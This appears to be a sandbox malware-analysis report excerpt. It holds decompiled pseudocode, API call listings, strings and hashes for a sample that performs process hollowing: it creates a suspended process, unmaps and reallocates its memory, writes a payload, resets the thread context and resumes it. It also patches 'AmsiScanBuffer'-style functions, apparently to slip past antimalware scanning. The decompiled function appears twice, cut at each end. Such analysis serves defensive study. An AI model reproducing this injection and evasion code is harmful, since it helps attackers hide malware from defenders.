						E02733690(_v36, _t494, _t535, 0);
						_push(0x2734460);
						_push( *0x2744438);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v44, E02724D64(_v48));
						_push(_v44);
						_t503 =  *0x2744438; // 0x0
						E02724BB0( &_v56, _t503, 0x2734460);
						E02724A98( &_v52, E02724D64(_v56));
						_pop(_t540);
						E02733690(_v52, _t494, _t540, 0);
						if(CreateProcessA(E02724D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2744310, 0x2744300) != 0) {
							0x2744354->ContextFlags = 0x10007;
							_t225 =  *0x2744304; // 0x0
							if(GetThreadContext(_t225, 0x2744354) != 0) {
								_push(0x2734460);
								_push( *0x2744438);
								_push("ScanBuffer");
								E02724C24();
								E02724A98( &_v60, E02724D64(_v64));
								_push(_v60);
								_t504 =  *0x2744438; // 0x0
								E02724BB0( &_v72, _t504, 0x2734460);
								E02724A98( &_v68, E02724D64(_v72));
								_pop(_t545);
								E02733690(_v68, _t494, _t545, 0);
								_push(0x2734460);
								_push( *0x2744438);
								_push("OpenSession");
								E02724C24();
								E02724A98( &_v76, E02724D64(_v80));
								_push(_v76);
								_t505 =  *0x2744438; // 0x0
								E02724BB0( &_v88, _t505, 0x2734460);
								E02724A98( &_v84, E02724D64(_v88));
								_pop(_t550);
								E02733690(_v84, _t494, _t550, 0);
								_t255 =  *0x27443f8; // 0x0
								_t257 = 0x2744300->hProcess; // 0x0
								ReadProcessMemory(_t257, _t255 + 8, 0x2744428, 4, 0x2744430);
								_t259 =  *0x2744424; // 0x0
								_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2744428; // 0x0
								if(_t634 != 0) {
									_t261 =  *0x2744424; // 0x0
									_t263 =  *0x2744424; // 0x0
									_t265 = 0x2744300->hProcess; // 0x0
									 *0x274442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
								} else {
									_push(0x2734460);
									_push( *0x2744438);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v92, E02724D64(_v96));
									_push(_v92);
									_t517 =  *0x2744438; // 0x0
									E02724BB0( &_v104, _t517, 0x2734460);
									E02724A98( &_v100, E02724D64(_v104));
									_pop(_t613);
									E02733690(_v100, _t494, _t613, 0);
									_push(0x2734460);
									_push( *0x2744438);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v108, E02724D64(_v112));
									_push(_v108);
									_t518 =  *0x2744438; // 0x0
									E02724BB0( &_v120, _t518, 0x2734460);
									E02724A98( &_v116, E02724D64(_v120));
									_pop(_t618);
									E02733690(_v116, _t494, _t618, 0);
									_t477 =  *0x2744424; // 0x0
									_t479 = 0x2744300->hProcess; // 0x0
									if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
										_t481 =  *0x2744424; // 0x0
										_t483 = 0x2744300->hProcess; // 0x0
										 *0x274442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
									} else {
										_t485 =  *0x2744424; // 0x0
										_t487 =  *0x2744424; // 0x0
										_t489 = 0x2744300->hProcess; // 0x0
										 *0x274442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
									}
								}
								if( *0x274442c != 0) {
									_t495 = E027338A0(_t494, _t641);
									_t269 =  *0x2744424; // 0x0
									_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x274442c; // 0x0
									if(_t637 != 0) {
										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v124, E02724D64(_v128));
										_push(_v124);
										_t512 =  *0x2744438; // 0x0
										E02724BB0( &_v136, _t512, 0x2734460);
										E02724A98( &_v132, E02724D64(_v136));
										_pop(_t588);
										E02733690(_v132, _t495, _t588, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v140, E02724D64(_v144));
										_push(_v140);
										_t513 =  *0x2744438; // 0x0
										E02724BB0( &_v152, _t513, 0x2734460);
										E02724A98( &_v148, E02724D64(_v152));
										_pop(_t593);
										E02733690(_v148, _t495, _t593, 0);
										_t412 =  *0x2744424; // 0x0
										_t594 =  *0x274442c; // 0x0
										_t413 =  *0x2744424; // 0x0
										E02733798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
										_t415 =  *0x2744424; // 0x0
										_t596 =  *0x274442c; // 0x0
										 *(_t415 + 0x34) = _t596;
										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v156, E02724D64(_v160));
										_push(_v156);
										_t514 =  *0x2744438; // 0x0
										E02724BB0( &_v168, _t514, 0x2734460);
										E02724A98( &_v164, E02724D64(_v168));
										_pop(_t601);
										E02733690(_v164, _t495, _t601, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v172, E02724D64(_v176));
										_push(_v172);
										_t515 =  *0x2744438; // 0x0
										E02724BB0( &_v184, _t515, 0x2734460);
										E02724A98( &_v180, E02724D64(_v184));
										_pop(_t606);
										E02733690(_v180, _t495, _t606, 0);
										_push(0);
										_push(_t495);
										_t445 =  *0x2744420; // 0x0
										asm("cdq");
										asm("adc edx, [esp+0x4]");
										_t608 =  *0x2744424; // 0x0
										E02726A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
									}
									_push(0x2734460);
									_push( *0x2744438);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v188, E02724D64(_v192));
									_push(_v188);
									_t506 =  *0x2744438; // 0x0
									E02724BB0( &_v200, _t506, 0x2734460);
									E02724A98( &_v196, E02724D64(_v200));
									_pop(_t555);
									E02733690(_v196, _t495, _t555, 0);
									_push(0x2734460);
									_push( *0x2744438);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v204, E02724D64(_v208));
									_push(_v204);
									_t507 =  *0x2744438; // 0x0
									E02724BB0( &_v216, _t507, 0x2734460);
									E02724A98( &_v212, E02724D64(_v216));
									_pop(_t560);
									E02733690(_v212, _t495, _t560, 0);
									E02724A98( &_v220, "KernelBase");
									 *0x2744468 = E0272CAC8(_v220, _t495, 0x8000);
									_t303 =  *0x2744468; // 0x0
									 *0x274446c = GetProcAddress(_t303, "WriteProcessMemory");
									_t305 =  *0x2744468; // 0x0
									FreeLibrary(_t305);
									_t307 =  *0x2744424; // 0x0
									_t309 =  *0x274442c; // 0x0
									_t310 = 0x2744300->hProcess; // 0x0
									 *0x274446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2744430);
									_t312 =  *0x2744430; // 0x0
									_t313 =  *0x2744424; // 0x0
									_t315 =  *0x274442c; // 0x0
									_t316 = 0x2744300->hProcess; // 0x0
									NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
									_t318 =  *0x2744424; // 0x0
									 *0x2744404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x274442c;
									_push(0x2734460);
									_push( *0x2744438);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v224, E02724D64(_v228));
									_push(_v224);
									_t508 =  *0x2744438; // 0x0
									E02724BB0( &_v236, _t508, 0x2734460);
									E02724A98( &_v232, E02724D64(_v236));
									_pop(_t567);
									E02733690(_v232, _t495, _t567, 0);
									_push(0x2734460);
									_push( *0x2744438);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v240, E02724D64(_v244));
									_push(_v240);
									_t509 =  *0x2744438; // 0x0
									E02724BB0( &_v252, _t509, 0x2734460);
									E02724A98( &_v248, E02724D64(_v252));
									_pop(_t572);
									E02733690(_v248, _t495, _t572, 0);
									_t349 =  *0x2744304; // 0x0
									SetThreadContext(_t349, 0x2744354);
									_push(0x2734460);
									_push( *0x2744438);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v256, E02724D64(_v260));
									_push(_v256);
									_t510 =  *0x2744438; // 0x0
									E02724BB0( &_v268, _t510, 0x2734460);
									E02724A98( &_v264, E02724D64(_v268));
									_pop(_t577);
									E02733690(_v264, _t495, _t577, 0);
									_push(0x2734460);
									_push( *0x2744438);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v272, E02724D64(_v276));
									_push(_v272);
									_t511 =  *0x2744438; // 0x0
									E02724BB0( &_v284, _t511, 0x2734460);
									E02724A98( &_v280, E02724D64(_v284));
									_pop(_t582);
									E02733690(_v280, _t495, _t582, 0);
									_t379 =  *0x2744304; // 0x0
									NtResumeThread(_t379);
									E02722C5C(_t495);
								}
							}
						}
					}
				}
				_pop(_t526);
				 *[fs:eax] = _t526;
				_push(E02734432);
				return E027248C4( &_v284, 0x46);
			}

0x02733990
0x02733990
0x02733991
0x02733993
0x02733998
0x02733998
0x0273399a
0x0273399c
0x0273399c
0x0273399f
0x027339a0
0x027339a1
0x027339a3
0x027339a9
0x027339b0
0x027339b1
0x027339b6
0x027339b9
0x027339c1
0x027339c6
0x027339c7
0x027339ce
0x027339eb
0x027339d0
0x027339da
0x027339da
0x027339f0
0x027339f5
0x027339fb
0x02733a08
0x02733a1a
0x02733a22
0x02733a26
0x02733a31
0x02733a43
0x02733a4b
0x02733a4c
0x02733a53
0x02733a59
0x02733a63
0x02733a6d
0x02733a6e
0x02733a6f
0x02733a77
0x02733a7b
0x02733a82
0x02733a87
0x02733a92
0x02733aa4
0x02733ab5
0x02733aba
0x02733ac4
0x02733ac9
0x02733acf
0x02733adc
0x02733aee
0x02733af6
0x02733afa
0x02733b05
0x02733b17
0x02733b1f
0x02733b20
0x02733b25
0x02733b2a
0x02733b30
0x02733b3d
0x02733b4f
0x02733b57
0x02733b5b
0x02733b66
0x02733b78
0x02733b80
0x02733b81
0x02733bae
0x02733bb4
0x02733bc3
0x02733bd0
0x02733bd6
0x02733bdb
0x02733be1
0x02733bee
0x02733c00
0x02733c08
0x02733c0c
0x02733c17
0x02733c29
0x02733c31
0x02733c32
0x02733c37
0x02733c3c
0x02733c42
0x02733c4f
0x02733c61
0x02733c69
0x02733c6d
0x02733c78
0x02733c8a
0x02733c92
0x02733c93
0x02733ca4
0x02733cad
0x02733cb3
0x02733cb8
0x02733cc0
0x02733cc6
0x02733dfc
0x02733e05
0x02733e0e
0x02733e19
0x02733ccc
0x02733ccc
0x02733cd1
0x02733cd7
0x02733ce4
0x02733cf6
0x02733cfe
0x02733d02
0x02733d0d
0x02733d1f
0x02733d27
0x02733d28
0x02733d2d
0x02733d32
0x02733d38
0x02733d45
0x02733d57
0x02733d5f
0x02733d63
0x02733d6e
0x02733d80
0x02733d88
0x02733d89
0x02733d8e
0x02733d97
0x02733da4
0x02733dd8
0x02733de3
0x02733dee
0x02733da6
0x02733dad
0x02733db6
0x02733dbf
0x02733dca
0x02733dca
0x02733da4
0x02733e25
0x02733e32
0x02733e34
0x02733e3c
0x02733e42
0x02733e48
0x02733e4d
0x02733e53
0x02733e60
0x02733e72
0x02733e7a
0x02733e81
0x02733e8c
0x02733ea1
0x02733ea9
0x02733eaa
0x02733eaf
0x02733eb4
0x02733eba
0x02733eca
0x02733ee2
0x02733eed
0x02733ef4
0x02733eff
0x02733f17
0x02733f22
0x02733f23
0x02733f28
0x02733f2d
0x02733f37
0x02733f3e
0x02733f43
0x02733f48
0x02733f4e
0x02733f51
0x02733f56
0x02733f5c
0x02733f6c
0x02733f84
0x02733f8f
0x02733f96
0x02733fa1
0x02733fb9
0x02733fc4
0x02733fc5
0x02733fca
0x02733fcf
0x02733fd5
0x02733fe5
0x02733ffd
0x02734008
0x0273400f
0x0273401a
0x02734032
0x0273403d
0x0273403e
0x02734047
0x02734048
0x02734049
0x02734051
0x02734055
0x02734061
0x02734067
0x02734067
0x0273406c
0x02734071
0x02734077
0x02734087
0x0273409f
0x027340aa
0x027340b1
0x027340bc
0x027340d4
0x027340df
0x027340e0
0x027340e5
0x027340ea
0x027340f0
0x02734100
0x02734118
0x02734123
0x0273412a
0x02734135
0x0273414d
0x02734158
0x02734159
0x02734169
0x0273417e
0x02734188
0x02734193
0x02734198
0x0273419e
0x027341a8
0x027341b2
0x027341b8
0x027341be
0x027341c4
0x027341cc
0x027341d5
0x027341db
0x027341e1
0x027341e6
0x027341f4
0x027341f9
0x027341fe
0x02734204
0x02734214
0x0273422c
0x02734237
0x0273423e
0x02734249
0x02734261
0x0273426c
0x0273426d
0x02734272
0x02734277
0x0273427d
0x0273428d
0x027342a5
0x027342b0
0x027342b7
0x027342c2
0x027342da
0x027342e5
0x027342e6
0x027342f0
0x027342f6
0x027342fb
0x02734300
0x02734306
0x02734316
0x0273432e
0x02734339
0x02734340
0x0273434b
0x02734363
0x0273436e
0x0273436f
0x02734374
0x02734379
0x0273437f
0x0273438f
0x027343a7
0x027343b2
0x027343b9
0x027343c4
0x027343dc
0x027343e7
0x027343e8
0x027343ed
0x027343f3
0x02734402
0x02734407
0x02733e25
0x02733bd0
0x02733bae
0x02733a92
0x0273440f
0x02734412
0x02734415
0x0273442a

APIs

InetIsOffline.URL(00000000,00000000,0273442B,?,?,?,00000000,00000000), ref: 027339C7

Part of subcall function 02733690: LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
Part of subcall function 02733690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
Part of subcall function 02733690: GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
Part of subcall function 02733690: RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
Part of subcall function 02733690: GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
Part of subcall function 02733690: NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
Part of subcall function 02733690: FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02744310,02744300,OpenSession,02734460,ScanBuffer,02734460), ref: 02733BA7
GetThreadContext.KERNEL32(00000000,02744354,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02744310,02744300,OpenSession,02734460,ScanBuffer,02734460), ref: 02733BC9
ReadProcessMemory.KERNEL32(00000000,-00000008,02744428,00000004,02744430,OpenSession,02734460,ScanBuffer,02734460,00000000,02744354,00000000,00000000,00000000,00000000,00000000), ref: 02733CB3
NtUnmapViewOfSection.N(00000000,?,OpenSession,02734460,ScanBuffer,02734460,00000000,-00000008,02744428,00000004,02744430,OpenSession,02734460,ScanBuffer,02734460,00000000), ref: 02733D9D
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,OpenSession,02734460,ScanBuffer,02734460,00000000,-00000008,02744428,00000004,02744430), ref: 02733DC5

Part of subcall function 0272CAC8: SetErrorMode.KERNEL32 ref: 0272CAD2
Part of subcall function 0272CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0272CB1C,?,00000000,0272CB3A), ref: 0272CB01

VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040,00000000,?,OpenSession,02734460,ScanBuffer,02734460,00000000,-00000008,02744428,00000004,02744430), ref: 02733DE9
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,-00000008,02744428,00000004,02744430,OpenSession,02734460,ScanBuffer,02734460,00000000,02744354), ref: 02733E14
GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 0273418E
FreeLibrary.KERNEL32(00000000,00000000,WriteProcessMemory,OpenSession,02734460,ScanBuffer,02734460,00000000,?,?,00003000,00000040,00000000,-00000008,02744428,00000004), ref: 0273419E
NtProtectVirtualMemory.N(00000000,00000000,?,00000001,00000000), ref: 027341E1
SetThreadContext.KERNEL32(00000000,02744354,OpenSession,02734460,ScanBuffer,02734460,00000000,00000000,?,00000001,00000000), ref: 027342F6
NtResumeThread.N(00000000,OpenSession,02734460,ScanBuffer,02734460,00000000,02744354,OpenSession,02734460,ScanBuffer,02734460,00000000,00000000,?,00000001,00000000), ref: 027343F3

Strings

OpenSession, xrefs: 027339FB, 02733B30, 02733C42, 02733D38, 02733EBA, 02733FD5, 027340F0, 0273427D, 0273437F
WriteProcessMemory, xrefs: 02734183
teSe, xrefs: 027339D5
ScanBuffer, xrefs: 02733ACF, 02733BE1, 02733CD7, 02733E53, 02733F5C, 02734077, 02734204, 02734306
KernelBase, xrefs: 02734164

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Virtual$LibraryMemory$AllocProcessThread$AddressContextFreeLoadProc$CreateCurrentErrorFlushHandleInetModeModuleMoveOfflineProtectReadResumeSectionUnmapView
String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
API String ID: 3085142473-3519499064
Opcode ID: c01e294d0fae6bf0e4d686590c7db526cae71d615e68f59ae5c78a5f71a350d7
Instruction ID: 908db74c0f84d8ba0e0afd93fa3eeb325c1482438eb5b1bfb7e74b54bbd0ee62
Opcode Fuzzy Hash: c01e294d0fae6bf0e4d686590c7db526cae71d615e68f59ae5c78a5f71a350d7
Instruction Fuzzy Hash: 61427275B40218EBDB12EB68ECA5F8E73FAFB44710F5184A6E104A7205CB34ED499F54

Uniqueness

Uniqueness Score: -1.00%

Function 0273398E Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 633
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0273398E(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				void* _t164;
				short* _t181;
				intOrPtr _t186;
				intOrPtr* _t189;
				void* _t225;
				intOrPtr _t255;
				void* _t257;
				intOrPtr _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				void* _t265;
				intOrPtr _t269;
				struct HINSTANCE__* _t303;
				struct HINSTANCE__* _t305;
				intOrPtr _t307;
				PVOID* _t309;
				void* _t310;
				long* _t312;
				intOrPtr _t313;
				PVOID* _t315;
				void* _t316;
				intOrPtr _t318;
				void* _t349;
				void* _t379;
				intOrPtr _t412;
				intOrPtr _t413;
				intOrPtr _t415;
				intOrPtr _t445;
				intOrPtr _t477;
				void* _t479;
				intOrPtr _t481;
				void* _t483;
				intOrPtr _t485;
				intOrPtr _t487;
				void* _t489;
				intOrPtr _t494;
				void* _t495;
				void* _t496;
				intOrPtr _t497;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				intOrPtr _t510;
				intOrPtr _t511;
				intOrPtr _t512;
				intOrPtr _t513;
				intOrPtr _t514;
				intOrPtr _t515;
				intOrPtr _t517;
				intOrPtr _t518;
				void* _t525;
				intOrPtr _t526;
				void* _t535;
				void* _t540;
				void* _t545;
				void* _t550;
				void* _t555;
				void* _t560;
				void* _t567;
				void* _t572;
				void* _t577;
				void* _t582;
				void* _t588;
				void* _t593;
				PVOID* _t594;
				PVOID* _t596;
				void* _t601;
				void* _t606;
				intOrPtr _t608;
				void* _t613;
				void* _t618;
				intOrPtr _t624;
				intOrPtr _t625;
				void* _t634;
				void* _t637;
				void* _t641;

				_t641 = __fp0;
				_t620 = __esi;
				_t624 = _t625;
				_t496 = 0x23;
				goto L2;
				L19:
				_pop(_t526);
				 *[fs:eax] = _t526;
				_push(E02734432);
				return E027248C4( &_v284, 0x46);
				L2:
				_push(0);
				_push(0);
				_t496 = _t496 - 1;
				if(_t496 != 0) {
					goto L2;
				} else {
					_push(__ebx);
					_push(__esi);
					_t494 = __edx;
					_v8 = __eax;
					E02724D54(_v8);
					_push(_t624);
					_push(0x273442b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t625;
					_t164 = E0272304C(0x270e);
					_push(_t164);
					L02733780();
					if(_t164 == 0) {
						E027248F4(0x2744438, 0x2734454);
					} else {
						E027248F4(0x2744438, 0x2734444);
					}
					_push(0x2734460);
					_push( *0x2744438);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v12, E02724D64(_v16));
					_push(_v12);
					_t497 =  *0x2744438; // 0x0
					E02724BB0( &_v24, _t497, 0x2734460);
					E02724A98( &_v20, E02724D64(_v24));
					_pop(_t525);
					E02733690(_v20, _t494, _t525, _t620);
					 *0x2744420 = _t494;
					_t181 =  *0x2744420; // 0x0
					if( *_t181 == 0x5a4d) {
						_push(0);
						_push(_t494);
						_t186 =  *0x2744420; // 0x0
						asm("cdq");
						asm("adc edx, [esp+0x4]");
						 *0x2744424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
						_t189 =  *0x2744424; // 0x0
						if( *_t189 == 0x4550) {
							E02723518(0x2744310, 0x44);
							E02723518(0x2744300, 0x10);
							0x2744310->cb = 0x44;
							_push(0x2734460);
							_push( *0x2744438);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v28, E02724D64(_v32));
							_push(_v28);
							_t502 =  *0x2744438; // 0x0
							E02724BB0( &_v40, _t502, 0x2734460);
							E02724A98( &_v36, E02724D64(_v40));
							_pop(_t535);
							E02733690(_v36, _t494, _t535, 0);
							_push(0x2734460);
							_push( *0x2744438);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v44, E02724D64(_v48));
							_push(_v44);
							_t503 =  *0x2744438; // 0x0
							E02724BB0( &_v56, _t503, 0x2734460);
							E02724A98( &_v52, E02724D64(_v56));
							_pop(_t540);
							E02733690(_v52, _t494, _t540, 0);
							if(CreateProcessA(E02724D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2744310, 0x2744300) != 0) {
								0x2744354->ContextFlags = 0x10007;
								_t225 =  *0x2744304; // 0x0
								if(GetThreadContext(_t225, 0x2744354) != 0) {
									_push(0x2734460);
									_push( *0x2744438);
									_push("ScanBuffer");
									E02724C24();
									E02724A98( &_v60, E02724D64(_v64));
									_push(_v60);
									_t504 =  *0x2744438; // 0x0
									E02724BB0( &_v72, _t504, 0x2734460);
									E02724A98( &_v68, E02724D64(_v72));
									_pop(_t545);
									E02733690(_v68, _t494, _t545, 0);
									_push(0x2734460);
									_push( *0x2744438);
									_push("OpenSession");
									E02724C24();
									E02724A98( &_v76, E02724D64(_v80));
									_push(_v76);
									_t505 =  *0x2744438; // 0x0
									E02724BB0( &_v88, _t505, 0x2734460);
									E02724A98( &_v84, E02724D64(_v88));
									_pop(_t550);
									E02733690(_v84, _t494, _t550, 0);
									_t255 =  *0x27443f8; // 0x0
									_t257 = 0x2744300->hProcess; // 0x0
									ReadProcessMemory(_t257, _t255 + 8, 0x2744428, 4, 0x2744430);
									_t259 =  *0x2744424; // 0x0
									_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2744428; // 0x0
									if(_t634 != 0) {
										_t261 =  *0x2744424; // 0x0
										_t263 =  *0x2744424; // 0x0
										_t265 = 0x2744300->hProcess; // 0x0
										 *0x274442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
									} else {
										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v92, E02724D64(_v96));
										_push(_v92);
										_t517 =  *0x2744438; // 0x0
										E02724BB0( &_v104, _t517, 0x2734460);
										E02724A98( &_v100, E02724D64(_v104));
										_pop(_t613);
										E02733690(_v100, _t494, _t613, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v108, E02724D64(_v112));
										_push(_v108);
										_t518 =  *0x2744438; // 0x0
										E02724BB0( &_v120, _t518, 0x2734460);
										E02724A98( &_v116, E02724D64(_v120));
										_pop(_t618);
										E02733690(_v116, _t494, _t618, 0);
										_t477 =  *0x2744424; // 0x0
										_t479 = 0x2744300->hProcess; // 0x0
										if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
											_t481 =  *0x2744424; // 0x0
											_t483 = 0x2744300->hProcess; // 0x0
											 *0x274442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
										} else {
											_t485 =  *0x2744424; // 0x0
											_t487 =  *0x2744424; // 0x0
											_t489 = 0x2744300->hProcess; // 0x0
											 *0x274442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
										}
									}
									if( *0x274442c != 0) {
										_t495 = E027338A0(_t494, _t641);
										_t269 =  *0x2744424; // 0x0
										_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x274442c; // 0x0
										if(_t637 != 0) {
											_push(0x2734460);
											_push( *0x2744438);
											_push("ScanBuffer");
											E02724C24();
											E02724A98( &_v124, E02724D64(_v128));
											_push(_v124);
											_t512 =  *0x2744438; // 0x0
											E02724BB0( &_v136, _t512, 0x2734460);
											E02724A98( &_v132, E02724D64(_v136));
											_pop(_t588);
											E02733690(_v132, _t495, _t588, 0);
											_push(0x2734460);
											_push( *0x2744438);
											_push("OpenSession");
											E02724C24();
											E02724A98( &_v140, E02724D64(_v144));
											_push(_v140);
											_t513 =  *0x2744438; // 0x0
											E02724BB0( &_v152, _t513, 0x2734460);
											E02724A98( &_v148, E02724D64(_v152));
											_pop(_t593);
											E02733690(_v148, _t495, _t593, 0);
											_t412 =  *0x2744424; // 0x0
											_t594 =  *0x274442c; // 0x0
											_t413 =  *0x2744424; // 0x0
											E02733798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
											_t415 =  *0x2744424; // 0x0
											_t596 =  *0x274442c; // 0x0
											 *(_t415 + 0x34) = _t596;
											_push(0x2734460);
											_push( *0x2744438);
											_push("ScanBuffer");
											E02724C24();
											E02724A98( &_v156, E02724D64(_v160));
											_push(_v156);
											_t514 =  *0x2744438; // 0x0
											E02724BB0( &_v168, _t514, 0x2734460);
											E02724A98( &_v164, E02724D64(_v168));
											_pop(_t601);
											E02733690(_v164, _t495, _t601, 0);
											_push(0x2734460);
											_push( *0x2744438);
											_push("OpenSession");
											E02724C24();
											E02724A98( &_v172, E02724D64(_v176));
											_push(_v172);
											_t515 =  *0x2744438; // 0x0
											E02724BB0( &_v184, _t515, 0x2734460);
											E02724A98( &_v180, E02724D64(_v184));
											_pop(_t606);
											E02733690(_v180, _t495, _t606, 0);
											_push(0);
											_push(_t495);
											_t445 =  *0x2744420; // 0x0
											asm("cdq");
											asm("adc edx, [esp+0x4]");
											_t608 =  *0x2744424; // 0x0
											E02726A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
										}
										_push(0x2734460);
										_push( *0x2744438);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v188, E02724D64(_v192));
										_push(_v188);
										_t506 =  *0x2744438; // 0x0
										E02724BB0( &_v200, _t506, 0x2734460);
										E02724A98( &_v196, E02724D64(_v200));
										_pop(_t555);
										E02733690(_v196, _t495, _t555, 0);
										_push(0x2734460);
										_push( *0x2744438);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v204, E02724D64(_v208));
										_push(_v204);
										_t507 =  *0x2744438; // 0x0
										E02724BB0( &_v216, _t507, 0x2734460);
										E02724A98( &_v212, E02724D64(_v216));
										_pop(_t560);
										E02733690(_v212, _t495, _t560, 0);
										E02724A98( &_v220, "KernelBase");
										 *0x2744468 = E0272CAC8(_v220, _t495, 0x8000);
										_t303 =  *0x2744468; // 0x0
										 *0x274446c = GetProcAddress(_t303, "WriteProcessMemory");
										_t305 =  *0x2744468; // 0x0
										FreeLibrary(_t305);
										_t307 =  *0x2744424; // 0x0
										_t309 =  *0x274442c; // 0x0
										_t310 = 0x2744300->hProcess; // 0x0
										 *0x274446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2744430);
										_t312 =  *0x2744430; // 0x0
										_t313 =  *0x2744424; // 0x0
										_t315 =  *0x274442c; // 0x0
										_t316 = 0x2744300->hProcess; // 0x0
										NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
										_t318 =  *0x2744424; // 0x0
										 *0x2744404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x274442c;
